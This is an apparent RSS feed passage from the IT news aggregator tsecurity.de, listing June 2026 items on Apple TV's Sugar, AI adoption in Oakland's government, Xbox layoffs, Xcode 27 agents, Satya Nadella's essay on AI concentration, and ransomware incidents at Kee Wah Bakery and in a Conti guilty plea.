<link>https://tsecurity.de/de/3610374/ios-mac-os/sugar-season-2-episode-1-is-out-now-on-apple-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610374/ios-mac-os/sugar-season-2-episode-1-is-out-now-on-apple-tv/</guid>
<pubDate>Fri, 19 Jun 2026 14:40:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar season 2 is now streaming on Apple TV, bringing Colin Farrell back as private detective John Sugar for another stylish mystery in Los Angeles. The new season begins with Sugar taking on a new missing-persons case while still searching for his missing sister, giving the story a more personal direction from the start.



The first episode is available now, and the rest of the season will roll out weekly. After the big reveal in season 1, the show now has more room to explore Sugar’s identity, his emotional struggle, and the dangerous world around him.



Sugar Season 2 Release Details




Episodes: 8 episodes



Genre: Neo-noir detective drama, mystery, thriller



Start date: June 19, 2026



Finale date: August 7, 2026



Release schedule: One new episode every Friday



Streaming on: Apple TV





https://www.youtube.com/watch?v=WJMbHySi5eQ




Plot



Spoiler warning for season 1: Sugar season 2 continues after John Sugar chose to stay on Earth in hopes of finding his missing sister. This time, he investigates the disappearance of the older brother of an up-and-coming local boxer, but the case soon opens up into a bigger conspiracy across Los Angeles.



The season keeps the detective story at the center while adding more emotional weight to Sugar’s journey. His new case pushes him into darker corners of the city, and his personal search makes every lead feel more urgent.



Sugar season 2 is now streaming on Apple TV, with new episodes arriving every Friday. Apple TV costs $12.99 per month in the US after a free trial. What do you plan to watch this week? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[PEPR '26 - Adopting AI in Local Government with Privacy and Equity in Mind: A Case Study of the...]]></title>
<description><![CDATA[Author: USENIX - Bewertung: 0x - Views:0 Adopting AI in Local Government with Privacy and Equity in Mind: A Case Study of the City of Oakland

Vinal Dalcy Dsouza and Rebecca Williams Earle, Northeastern University

We are partnering with the City of Oakland to understand how AI can safely support...]]></description>
<link>https://tsecurity.de/de/3609133/it-security-video/pepr-26-adopting-ai-in-local-government-with-privacy-and-equity-in-mind-a-case-study-of-the/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609133/it-security-video/pepr-26-adopting-ai-in-local-government-with-privacy-and-equity-in-mind-a-case-study-of-the/</guid>
<pubDate>Fri, 19 Jun 2026 02:03:18 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: USENIX - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/yE9Sz7o5mvM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Adopting AI in Local Government with Privacy and Equity in Mind: A Case Study of the City of Oakland<br />
<br />
Vinal Dalcy Dsouza and Rebecca Williams Earle, Northeastern University<br />
<br />
We are partnering with the City of Oakland to understand how AI can safely support city workflows and processes. Federal cuts are increasing the strain on local governments, which must meet community needs with fewer resources. Artificial intelligence is often proposed as a solution, but local governments can be wary due to privacy and equity concerns. Oakland is piloting Microsoft Copilot, and we are measuring participant experiences and perceptions throughout the study through interviews and surveys with a sample of participants from a variety of city departments. We will share snapshots of participant perceptions of AI and privacy from multiple touchpoints during this 6 month study. We will also discuss how privacy and equity concerns, including public record requests, disparities in AI access, and fears of skill atrophy, shaped and in some cases, limited participant engagement with AI.<br />
Authors: Shufan Chai, Vinal Dalcy Dsouza, Rebecca Williams Earle, Rasika Bhalerao and Jessica Staddon<br />
<br />
View the full PEPR '26 program at https://www.usenix.org/conference/pepr26/program<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Onion’s rebooted InfoWars is coming July 2nd]]></title>
<description><![CDATA[The Onion's InfoWars officially has a launch date: On July 2nd, the conspiracy network previously run by Alex Jones will return as a comedy and media platform. The reboot comes more than a year and a half after news broke that the satirical news site was working to acquire the property owned by J...]]></description>
<link>https://tsecurity.de/de/3608477/it-nachrichten/the-onions-rebooted-infowars-is-coming-july-2nd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608477/it-nachrichten/the-onions-rebooted-infowars-is-coming-july-2nd/</guid>
<pubDate>Thu, 18 Jun 2026 19:03:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Onion's InfoWars officially has a launch date: On July 2nd, the conspiracy network previously run by Alex Jones will return as a comedy and media platform. The reboot comes more than a year and a half after news broke that the satirical news site was working to acquire the property owned by Jones, a […]]]></content:encoded>
</item>
<item>
<title><![CDATA[(g+) Nuclear Energy: Trump's 'nuclear bros': young entrepreneurs race to deliver US atomic revival]]></title>
<description><![CDATA[Young founders backed by Silicon Valley and Trump race to start reactors despite experts' safety fears Von Jamie Smyth (Atomkraft, Cloud Computing)]]></description>
<link>https://tsecurity.de/de/3607735/it-nachrichten/g-nuclear-energy-trumps-nuclear-bros-young-entrepreneurs-race-to-deliver-us-atomic-revival/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607735/it-nachrichten/g-nuclear-energy-trumps-nuclear-bros-young-entrepreneurs-race-to-deliver-us-atomic-revival/</guid>
<pubDate>Thu, 18 Jun 2026 14:31:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Young founders backed by Silicon Valley and Trump race to start reactors despite experts' safety fears Von Jamie Smyth (<a href="https://www.golem.de/specials/atomkraft/">Atomkraft</a>, <a href="https://www.golem.de/specials/cloud-computing/">Cloud Computing</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=209927&amp;page=1&amp;ts=1781785201" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Fears for Xbox as it puts its developers on the chopping block once again]]></title>
<description><![CDATA[After the billion-dollar company’s leaders sent staff a memo saying the brand had ‘over-extended’, game studios may be in the firing lineDon’t get Pushing Buttons delivered to your inbox? Sign up hereIn March 2000, Bill Gates stood onstage at the Game Developers Conference in San Francisco and, t...]]></description>
<link>https://tsecurity.de/de/3606461/it-nachrichten/fears-for-xbox-as-it-puts-its-developers-on-the-chopping-block-once-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606461/it-nachrichten/fears-for-xbox-as-it-puts-its-developers-on-the-chopping-block-once-again/</guid>
<pubDate>Thu, 18 Jun 2026 03:31:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>After the billion-dollar company’s leaders sent staff a memo saying the brand had ‘over-extended’, game studios may be in the firing line</p><ul><li><p><a href="https://www.theguardian.com/info/ng-interactive/2021/nov/24/sign-up-for-pushing-buttons-keza-macdonalds-weekly-look-at-the-world-of-gaming"><strong>Don’t get Pushing Buttons delivered to your inbox? Sign up here</strong></a></p></li></ul><p>In March 2000, Bill Gates stood onstage at the Game Developers Conference in San Francisco and, to a packed crowd, officially announced the company’s long-anticipated video game console. “We want Xbox to be the platform of choice for the best and most creative game developers in the world,” he told attenders – and that was indeed the intention of the small, dedicated team who put together the blueprints of that first machine.</p><p>The Xbox landscape seems very different 25 years later. Last week, mere days after a bullish summer showcase full of Gears of War revivals and promises of a renewed focus on Xbox’s gaming strengths, new CEO, Asha Sharma, and chief content officer, Matt Booty, <a href="https://news.xbox.com/en-us/2026/06/10/next-100-days-xbox-reset/">wrote a memo</a> to Xbox staff inviting them to brace for “hard truths”. “Excluding Activision Blizzard King, over the past five years, we have spent over $20bn on ongoing investments in our content, platform and hardware subsidy, but our annual revenue has declined nearly half a billion during that time. Going forward, this cannot continue,” it read.</p> <a href="https://www.theguardian.com/games/2026/jun/17/xbox-games-studios-developers-firing-line">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple's AI agents in Xcode 27 make vibe coding easier]]></title>
<description><![CDATA[Making an app with Xcode may soon become easier than ever with AI, as an Apple presentation highlights the different use cases and capabilities of agentic coding.Xcode 27 can build entire apps for you with the help of AI. Image Credit: AppleWhile WWDC 2026 saw all eyes on Siri AI, as Apple rolled...]]></description>
<link>https://tsecurity.de/de/3606337/ios-mac-os/apples-ai-agents-in-xcode-27-make-vibe-coding-easier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606337/ios-mac-os/apples-ai-agents-in-xcode-27-make-vibe-coding-easier/</guid>
<pubDate>Thu, 18 Jun 2026 01:06:32 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Making an app with <a href="https://appleinsider.com/inside/xcode" title="Xcode" data-kpt="1">Xcode</a> may soon become easier than ever with AI, as an Apple presentation highlights the different use cases and capabilities of agentic coding.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67982-143314-Screenshot-2026-06-18-at-125030-AM-Cropped-xl.jpg" alt="Large stage presentation with two speakers standing far apart, showcasing a huge laptop screen displaying a smartphone interface centered against a dark blue abstract background." height="738"><br><span>Xcode 27 can build entire apps for you with the help of AI. Image Credit: Apple</span></div><br>While <a href="https://appleinsider.com/inside/wwdc" title="WWDC" data-kpt="1">WWDC</a> 2026 saw all eyes on <a href="https://appleinsider.com/inside/siri" title="Siri" data-kpt="1">Siri</a> AI, as Apple rolled out features that were supposed to arrive <a href="https://appleinsider.com/articles/25/03/07/apple-confirms-that-apple-intelligence-siri-features-are-taking-longer-than-expected">two years ago</a>, the company also unveiled AI-focused developer tools. <a href="https://appleinsider.com/articles/26/06/17/apples-game-porting-toolkit-4-is-a-big-improvement-for-modern-game-coders">Game Porting Toolkit 4</a> includes support for agentic coding, and the same is true for Xcode 27.<br><br>In a nearly <a href="https://www.youtube.com/watch?v=Wpwjqk1UGnQ">90-minute video</a>, recorded at the <a href="https://appleinsider.com/inside/steve-jobs" title="Steve Jobs" data-kpt="1">Steve Jobs</a> Theater, Apple detailed the capabilities of Xcode 27 and its AI integration. In an era where even Apple executives <a href="https://appleinsider.com/articles/26/06/11/apple-executive-we-dont-do-ai-for-ais-sake">acknowledged</a> people's fears about being replaced by artificial intelligence, Apple sought to portray Xcode's agentic coding capabilities as a powerful extension.<br><br><br> <a href="https://appleinsider.com/articles/26/06/17/apples-ai-agents-in-xcode-27-make-vibe-coding-easier?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244688?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA['I'm delighted to be wrong about this' — Sam Altman says one of his biggest fears about AI hasn't come true]]></title>
<description><![CDATA[Sam Altman says AI has not disrupted white-collar employment as quickly as he expected.]]></description>
<link>https://tsecurity.de/de/3604382/it-nachrichten/im-delighted-to-be-wrong-about-this-sam-altman-says-one-of-his-biggest-fears-about-ai-hasnt-come-true/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604382/it-nachrichten/im-delighted-to-be-wrong-about-this-sam-altman-says-one-of-his-biggest-fears-about-ai-hasnt-come-true/</guid>
<pubDate>Wed, 17 Jun 2026 12:17:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sam Altman says AI has not disrupted white-collar employment as quickly as he expected.]]></content:encoded>
</item>
<item>
<title><![CDATA[63% of workers see AI making the workplace ‘less human’]]></title>
<description><![CDATA[IT and business leaders are full steam ahead on AI, with an eye toward improving efficiency and productivity. Employees, however, foresee AI use impacting workplace culture, as 63% say it will “make the workplace feel less human” and 57% say AI will reduce human skills, according to the AI and Wo...]]></description>
<link>https://tsecurity.de/de/3604248/it-security-nachrichten/63-of-workers-see-ai-making-the-workplace-less-human/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604248/it-security-nachrichten/63-of-workers-see-ai-making-the-workplace-less-human/</guid>
<pubDate>Wed, 17 Jun 2026 11:36:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IT and business leaders are full steam ahead on AI, with an eye toward improving efficiency and productivity. Employees, however, foresee AI use impacting workplace culture, as 63% say it will “make the workplace feel less human” and 57% say AI will reduce human skills, according to the <a href="https://www.resume-now.com/job-resources/careers/ai-workplace-humanity" rel="nofollow">AI and Workplace Humanity Report</a> from Resume Now.</p>



<p>Workers also believe the implementation of AI will devalue human work (43%), rendering the workplace a “cold, machine-driven environment” (20%) — only 16% say AI will make the workplace more human. Concerns around AI’s impact on <a href="https://www.cio.com/article/3841632/with-critical-thinking-in-decline-it-must-rethink-application-usability.html">critical thinking skills</a> and human connection are growing, and its fast adoption is pushing employees to question exactly how AI will be implemented moving forward. Leaders will need to take workplace culture into consideration with any AI strategy to address these concerns.</p>



<p>“Leaders must be clear and transparent with their AI strategy and principles. And employee voice can be a critical input to that strategy,” says Kaelyn Lowmaster, director analyst of the Gartner HR Practice. “Create channels for employees to surface concerns, ask questions, and suggest AI use cases. Especially as AI-native employees enter the workforce, employees can be a valuable source of information about how to use emerging tools well — and what to avoid.”</p>



<h2 class="wp-block-heading">Reinforce workplace culture to ease AI fears</h2>



<p>Leaders looking to implement AI will need to maintain open lines of communication and transparency around AI and its impact to help get employees on board, even enthusiastic, about AI.</p>



<p>“Dedicated mentorship time, team-based projects, and in-person or hybrid touchpoints can help bring people together. These efforts help strengthen collaboration and sense of connection, so the focus stays on people, not just the technology,” says Megan Slabinski, district president of technology talent solutions at Robert Half.</p>



<p>It’s important to communicate the organization’s goals for AI and to have a clear strategy in place for its implementation. Employees will need reassurance that they have job security and that they won’t be laid off or made redundant in the place of AI. There’s a lot of conflicting news and chatter about AI and its impact on jobs across every industry, so you’ll need to take this into consideration when rolling out any new AI strategy.</p>



<p>“No organization can fully predict the future, but they can provide clarity on employees’ current value and share plans for how their roles will change in the near- to mid-term. Gartner research shows that degree of clarity, more than any other form of support an organization can provide, drives employees to use AI,” says Lowmaster.</p>



<h2 class="wp-block-heading">Curbing potential culture problems stemming from AI</h2>



<p>IT leaders should also build narratives around the positives of AI, sharing how it can boost productivity, while emphasizing the continuing need for human oversight.</p>



<p>“AI is accelerating how organizations process information, automate tasks, and make decisions faster. What it is not doing is replacing the need for human judgment, oversight, and accountability. AI may complete 80% or 90% of a workflow, but the final layer still requires people to validate outcomes, make decisions, and assume responsibility,” says Frank Antezana, CEO of iTech AG.</p>



<p>Employees have growing concerns about <a href="https://www.cio.com/article/4185908/Workers%20express%20growing%20concerns%20around%20AI%E2%80%99s%20impact%20on%20critical%20thinking%20skills%20and%20human%20connection%20%E2%80%93%20its%20fast%20adoption%20is%20pushing%20employees%20to%20question%20exactly%20how%20AI%20will%20be%20implemented%20moving%20forward%20in%20their%20daily%20lives.">AI workslop</a>, the result of undertrained employees using AI to create low-quality outputs that must then be edited or reworked by coworkers. AI is also infamous for making egregious errors at times, requiring human intervention to correct or render effective.</p>



<p>Leaders will need to identify where AI might impact human collaboration as well, trying not to replace the need for interoffice communication, Lowmaster says. For example, if employees are overly reliant on AI to “brainstorm and review their work,” there’s a chance they’ll collaborate less with coworkers on those tasks, she adds. Moreover, if AI “boosts individual employees’ efficiency,” they might start feeling “unsustainable pressure to hit elevated, AI-driven targets for speed or output.”</p>



<p>While Lowmaster acknowledges that “overreliance on AI tools” can sometimes lead to “cases of poor employee judgment or low-quality output,” one of the “biggest barriers” Gartner’s research has uncovered is an overall “lack of trust in the accuracy of AI-generated output.” When employees shift accountability to bots, this can create additional work for other employees who are left to check or redo AI-generated work.</p>



<p>“Any major tech shift can feel impersonal at first, but businesses will always need professionals who can apply the technology and collaborate across teams. Companies that position AI as more of a support tool, rather than a replacement, will likely see stronger employee interest,” says Robert Half’s Slabinski.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Data leak fears after ransomware attack hits Hong Kong’s Kee Wah Bakery]]></title>
<description><![CDATA[A major bakery chain has been hit by a ransomware attack on its internal network, prompting Hong Kong’s privacy watchdog to seek details to assess the risk of a potential data leak.
Kee Wah Bakery, known for its local and Chinese pastries, revealed the incident on Tuesday, after its internal netw...]]></description>
<link>https://tsecurity.de/de/3603511/it-security-nachrichten/data-leak-fears-after-ransomware-attack-hits-hong-kongs-kee-wah-bakery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603511/it-security-nachrichten/data-leak-fears-after-ransomware-attack-hits-hong-kongs-kee-wah-bakery/</guid>
<pubDate>Wed, 17 Jun 2026 05:23:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A major bakery chain has been hit by a ransomware attack on its internal network, prompting Hong Kong’s privacy watchdog to seek details to assess the risk of a potential data leak.
Kee Wah Bakery, known for its local and Chinese pastries, revealed the incident on Tuesday, after its internal network malfunctioned on Friday last week.
A preliminary investigation found that a ransomware attack had targeted its system, which contains employees’ personal data as well as information related to...]]></content:encoded>
</item>
<item>
<title><![CDATA[Satya Nadella warns that AI could hollow out entire industries, echoing the damage done by globalization]]></title>
<description><![CDATA[Microsoft CEO Satya Nadella published a sweeping essay on Sunday laying out what he describes as the defining economic challenge of the AI era: the risk that a handful of frontier models will absorb the expertise of entire industries and commoditize it, leaving businesses stripped of their compet...]]></description>
<link>https://tsecurity.de/de/3600170/it-nachrichten/satya-nadella-warns-that-ai-could-hollow-out-entire-industries-echoing-the-damage-done-by-globalization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600170/it-nachrichten/satya-nadella-warns-that-ai-could-hollow-out-entire-industries-echoing-the-damage-done-by-globalization/</guid>
<pubDate>Mon, 15 Jun 2026 22:34:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft CEO Satya Nadella <a href="https://x.com/satyanadella/status/2066182223213293753">published a sweeping essay</a> on Sunday laying out what he describes as the defining economic challenge of the AI era: the risk that a handful of frontier models will absorb the expertise of entire industries and commoditize it, leaving businesses stripped of their competitive moats.</p><p>"The last thing any of us want is a world where every company across every sector is ceding value to a few models that eat everything they see," Nadella wrote in the piece, titled "A frontier without an ecosystem is not stable," which he posted on X. "If all the value is accrued by only a few models, the political economy will simply not tolerate it. There is no societal permission for an AI future that hollows out entire industries."</p><p>The essay is unusually philosophical for a sitting CEO of a $3 trillion technology company. But it arrives at a moment when the theoretical risks Nadella describes are becoming tangible — and, critically, when Microsoft itself is grappling with the very dynamics he warns about.</p><h2>Nadella introduces "token capital" as the new currency of enterprise AI strategy</h2><p>At the center of Nadella's essay sits a conceptual framework built on two pillars he calls "<a href="https://x.com/satyanadella/status/2066182223213293753">human capital</a>" and "<a href="https://x.com/satyanadella/status/2066182223213293753">token capital</a>." Human capital, he writes, "comprises the knowledge, judgment, relationships, ingenuity, and pattern recognition of its people," while token capital refers to "the firm's AI capability it builds and owns."</p><p>The two are not in tension, he insists. "Importantly, human capital does not become less valuable as token capital grows. It only becomes more valuable!" he writes. "I believe human agency will be the driver of token capital growth. Humans will set ambitious goals, connect dots across domains, build relationships, and recognize patterns that matter most. Without human direction, you have compute running in circles."</p><p>This framing is a deliberate counterweight to the narrative that <a href="https://hub.jhu.edu/2026/02/23/will-ai-make-human-workers-obsolete/">AI will simply replace human workers</a> or, at the enterprise level, dissolve the intellectual property that differentiates one company from another. Nadella is arguing that the real danger is not AI's capability but its tendency to centralize — and that the solution requires a fundamentally new architecture for how businesses interact with the technology.</p><p>He describes the real opportunity as "not in picking the best model but instead in building a learning loop on top of models where human capital and token capital compound." The key test of a company's sovereignty in this new era, he writes, is whether it can "switch out a 'generalist' model without losing the 'company veteran' expertise built into their learning system."</p><p>This is the essay's most actionable claim — and its most provocative. Nadella is telling enterprises they need to decouple their institutional intelligence from whatever frontier model they happen to be running, creating portable knowledge systems that survive vendor changes.</p><h2>Why Nadella is comparing AI concentration to the outsourcing crisis that gutted industrial economies</h2><p>Nadella draws a pointed historical parallel to make his warning concrete. "Think about what happened in the first phase of globalization where entire industrial economies were hollowed out by outsourcing," he writes. "The GDP numbers looked fine on the surface, but the displacement was real and the consequences are still being felt. Let us not bring that dynamic into the AI era, with a small number of AI systems capturing all the economic returns, while entire industries find their knowledge commoditized right out from underneath them."</p><p>The globalization analogy is not accidental. It reframes the AI concentration debate from a narrow technology question into a political-economy argument — one that regulators, policymakers, and voters can grasp. By invoking the social costs of offshoring, Nadella is signaling that the stakes extend well beyond the enterprise technology stack. He is warning that if the AI industry fails to distribute value broadly, the political system will intervene to force the issue.</p><p>"In my view, our priority has to be building a frontier ecosystem, not just a frontier model, so value flows broadly across every company, every industry, and every country," he writes. He grounds this in an older platform philosophy: "This is the ethos I've grown up with where platforms enable more value on top than is captured inside, and where every company can continuously innovate and build value of its own." It is a direct echo of the Windows-era argument, updated for the age of inference — and it carries a similarly self-interested subtext, given that Microsoft's cloud business sits squarely in that platform layer.</p><h2>Microsoft's own runaway AI costs reveal the gap between Nadella's vision and operational reality</h2><p>What makes Nadella's essay so striking is its timing. He published it on a day when Reuters reported that <a href="https://www.reuters.com/business/microsoft-sued-by-shareholders-over-expenses-cloud-business-ai-2026-06-15/">Microsoft shareholders filed a proposed class-action lawsuit</a> in Seattle federal court, accusing the company of inflating its stock price by failing to disclose slowing growth in its Azure cloud business and the need to spend billions of dollars on AI infrastructure. The suit names Nadella and Chief Financial Officer Amy Hood among the defendants.</p><p>As the <a href="https://finance.yahoo.com/markets/stocks/articles/msft-stock-rises-despite-shareholder-180947071.html">Yahoo Finance report</a> on the lawsuit noted, Microsoft allegedly "aggressively promoted its AI developments, specifically its 'Copilot' assistant and close financial alliance with ChatGPT creator OpenAI, to artificially boost investor optimism," while understating infrastructure strain and capital risks. Microsoft also reported <a href="https://www.reuters.com/business/retail-consumer/microsoft-edges-past-cloud-growth-expectations-2026-01-28/">$37.5 billion of capital spending</a> in its second quarter, up nearly 66% from a year earlier and above the $34.3 billion that analysts projected.</p><p>Microsoft's internal cost pressures around AI have surfaced in other concrete ways this year. The company is <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">canceling the majority of its internal Claude Code licenses</a> in its Experiences and Devices division, effective June 30, 2026. Monthly usage rates reached 84 to 95% by April 2026, and per-engineer API costs ranged between $500 and $2,000 monthly, according to <a href="https://windowsforum.com/threads/microsoft-cancels-internal-claude-code-licenses-pushes-copilot-cli-by-2026.418482/">Windows Forum</a>. The cancellation came after Microsoft exhausted portions of its annual AI budget due to token-based billing, as <a href="https://fortune.com/2026/05/22/microsoft-ai-cost-problem-tokens-agents/">Fortune</a> had reported in May.</p><p>The Claude Code episode illustrates, at the micro level, the exact dynamic Nadella describes at the macro level. When a company's AI usage is metered by the token — the fundamental unit of compute that powers model inference — the more productive the tool becomes, the more expensive it gets. The term "token capital" in Nadella's essay carries a double meaning: it refers both to a firm's proprietary AI capability and, implicitly, to the actual tokens consumed in running it. Building a learning loop that compounds is aspirational. Paying the bills for that loop is operational reality.</p><h2>Uber, Meta, and Amazon are all hitting the same AI spending wall — and it validates Nadella's warning</h2><p>Microsoft is not alone in this bind. <a href="https://finance.yahoo.com/sectors/technology/articles/uber-burned-entire-2026-ai-180347400.html">Uber burned through its entire 2026 AI coding tools budget</a> in just four months after incentivizing employees to adopt the technology through an internal leaderboard ranking teams by total AI tool usage. Uber has since instituted a monthly $1,500 cap per employee per agentic coding tool, according to <a href="https://techcrunch.com/2026/06/02/uber-caps-employee-ai-spending-after-blowing-through-budget-in-four-months/">TechCrunch</a>. At Meta, an employee created a leaderboard called "<a href="https://finance.yahoo.com/sectors/technology/articles/meta-just-killed-dashboard-let-084400197.html">Claudeonomics</a>" to track which workers consumed the most AI tokens. Amazon, meanwhile, has pushed employees to "<a href="https://fortune.com/2026/05/12/amazon-tokenmaxxing-claude-ai-capex-meta-gil-luria/">tokenmaxx</a>" — use as many AI tokens as possible.</p><p>The emerging pattern is clear: enterprises adopted AI coding tools aggressively, saw genuine productivity gains, and then discovered that the consumption-based economics of frontier models created budget crises that traditional software licensing never would have. Bryan Catanzaro, vice president of applied deep learning at Nvidia, captured the tension bluntly in an <a href="https://fortune.com/article/why-is-the-cost-of-ai-higher-than-human-workers-nvidia-executive/">interview with Axios</a>: "For my team, the cost of compute is far beyond the costs of the employees," he said.</p><p>These cost dynamics land differently in the context of Nadella's essay. He prescribes a three-layer architecture — evaluation, reinforcement learning, and retrieval — designed to sit between a company's workforce and whatever frontier model it subscribes to. Companies, he argues, need to build "private evals" that "capture whether a model is actually improving against outcomes that matter to the business (not just external benchmarks!)," alongside "private reinforcement learning environments" that "let models grow stronger on real traces from inside the organization" and a knowledge base that "makes institutional memory queryable and use of tokens more efficient." He calls the resulting system "a hill climbing machine" that, "unlike most assets, it compounds."</p><h2>Other Big Tech CEOs are echoing Nadella's fears about AI models devouring enterprise knowledge</h2><p>Nadella's concerns do not exist in isolation. Other technology leaders have been raising similar warnings throughout 2026, though none have offered as prescriptive a response.</p><p>Snowflake CEO Sridhar Ramaswamy warned in a <a href="https://podcasts.apple.com/us/podcast/whos-winning-the-ai-race-softwares-future-with/id1522960417?i=1000749256704">February podcast</a> that the biggest software companies risk being reduced to mere data sources. "The big model makers want to create a world in which all of the data for all of the enterprises is easily available to them," Ramaswamy said, describing everything else as "a dumb data pipe that feeds into that big brain." He added that Snowflake needs to operate with a "fear" that enterprises would abandon software-specific AI agents in favor of all-inclusive agents that hoover up data from everywhere.</p><p>Box CEO Aaron Levie struck a similar note in a <a href="https://www.linkedin.com/feed/update/urn:li:activity:7414386514186498048/">January LinkedIn post</a>. AI models can now perform high-level knowledge work across nearly every profession, from law to strategy to scientific research, he argued. "The question that we will have to wrestle with is, in a world where everyone has access to the same expert intelligence, how does a company differentiate?" he wrote.</p><p>The combined effect of these statements is a shared diagnosis from three very different corners of the enterprise technology market: the current trajectory of AI development threatens to collapse competitive differentiation across entire industries. Nadella's essay stands apart from the others because it moves beyond diagnosis and proposes a specific architectural remedy. But the prescription is impossible to separate from the prescriber's interests.</p><p>Microsoft sits in precisely the platform layer that Nadella's framework would make indispensable — the company builds its own frontier models, operates the cloud infrastructure those models run on, and maintains deep partnerships with the leading independent AI labs. A world in which every enterprise builds a proprietary learning loop on top of commodity foundation models is, conveniently, a world in which Microsoft sells the picks and shovels to all of them.</p><h2>Nadella's Scout controversy and shareholder lawsuit reveal the tension inside Microsoft's own AI strategy</h2><p>The essay also arrives just ten days after Nadella publicly rebuked one of his own executives for outlining a plan to "<a href="https://nypost.com/2026/06/05/business/microsofts-satya-nadella-slams-company-exec-for-outlining-plan-to-make-people-addicted-to-scout-ai-tool/">make people addicted</a>" to a new AI tool called Scout.. Microsoft corporate vice president Omar Shahine had written an internal memo describing a three-phase plan to transform Scout "from addictive app to agentic platform," with the first phase focused on features that "make people depend on it daily." Nadella responded on an internal message board: "This is absolutely a non-goal! If anything we are doing the exact opposite. We want to make sure AI empowers and adds real value to human endeavor and broad economic growth!"</p><p>The Scout incident and Sunday's essay together suggest Nadella is actively constructing a public philosophy of AI that emphasizes broad value creation over extractive engagement — whether or not every corner of Microsoft has internalized that message. One anonymous Microsoft employee told 404 Media, as the Post reported, that the leaked Scout document was "very troubling," adding: "It feels like one of those 'saying the quiet part out loud' moments."</p><p>For technical decision-makers evaluating Nadella's essay, the practical implications are significant. He is arguing that choosing an AI model matters less than building the learning infrastructure around it. He is arguing that the ability to swap models without losing institutional intelligence is the critical test of AI sovereignty. And he is warning that companies that fail to build these systems will find their expertise absorbed and commoditized by the models themselves. "You can offload a task, or even a job, but you can never offload your learning," Nadella writes. "The future of the firm is the ability to compound that learning across people and AI."</p><h2>The question Nadella's essay cannot answer is whether Microsoft will practice what its CEO preaches</h2><p>Whether Nadella's vision materializes depends on a question his essay carefully sidesteps: whether the platform providers who build and host the frontier ecosystem will resist the temptation to capture the value flowing through it. Nadella insists that "platforms enable more value on top than is captured inside." But Microsoft's own trajectory this year — the ballooning capital expenditures, the Claude Code budget crisis, the shareholder lawsuit alleging concealed costs, the internal memo about making users addicted — suggests the economics of restraint are harder than the philosophy of restraint.</p><p>Nadella ends his essay with the claim that broad value distribution "is the stable equilibrium we should build together." He may be right. Ecosystems have historically outperformed walled gardens over long time horizons. But stable equilibria require every major player to forgo short-term extraction in favor of long-term compounding — and right now, the AI industry is burning through budgets in four months and spending 66% more on infrastructure than analysts expected. The CEO of the world's most valuable technology company has written an eloquent argument for why the AI economy needs to work differently. The open question is whether his own company's balance sheet will let him prove it.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ukrainian national pleads guilty in connection with Conti ransomware]]></title>
<description><![CDATA[A Ukrainian national pleaded guilty to conspiracy to commit wire fraud in connection with the deployment of Conti ransomware, which targeted more than 1,000 victims worldwide. According to the U.S. Department of Justice, 44-year-old Oleksii Oleksiyovych Lytvynenko joined the Conti…
Read more →
Th...]]></description>
<link>https://tsecurity.de/de/3599198/it-security-nachrichten/ukrainian-national-pleads-guilty-in-connection-with-conti-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599198/it-security-nachrichten/ukrainian-national-pleads-guilty-in-connection-with-conti-ransomware/</guid>
<pubDate>Mon, 15 Jun 2026 15:08:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
